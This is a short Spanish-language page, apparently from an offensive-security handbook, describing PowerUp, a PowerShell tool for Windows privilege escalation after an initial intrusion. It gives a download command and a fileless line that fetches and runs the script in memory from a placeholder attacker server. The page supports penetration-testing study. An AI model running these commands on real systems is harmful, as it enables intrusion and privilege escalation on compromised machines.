search

PowerUp

Windows Privilege Escalation

PowerUP es una herramienta enfocada en post-explotación Windows escrita en PowerShell para ayudar en la búsqueda de vectores para escalar privilegios en entornos Windows Utiliza múltiples de técnicas para enumerar el sistema e identificar vulnerabilidades potenciales junto exploits específicos.

PowerUp puede utilizarse para:

  • Enumerar servicios

  • Enumerar Permisos

  • identificar configuraciones inseguras

  • Inyecciones y Secuestro de DLL

  • Abuso de Tareas Programadas

  • Identificar procesos con permisos elevados

  • Evadir ciertas medidas de Powershell

y no requiere necesariamente permisos administrativos.

hashtag
Instalación de PowerUp

  • se requiere instalar en el equipo comprometido cuando ya tienes una intrusión inicial

  • si no se utilizan técnicas de evasión adicionales el script es fácilmente detectable por medidas de seguridad básicas

iwr -Uri "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1" -OutFile PowerUp.ps1

hashtag
Ejecución de PowerUp

.\PowerUp.ps1

## Tecnicas Fileless (Ejecucion en memoria)

# Ejecutar directamente desde internet (Tecnicas Fileless por Ejecucion en memoria)
IEX (New-Object Net.WebClient).DownloadString('http://servidor.de.atacante.aqui/PowerUp.ps1')

PreviousWinPEASNextMimikatz

Last updated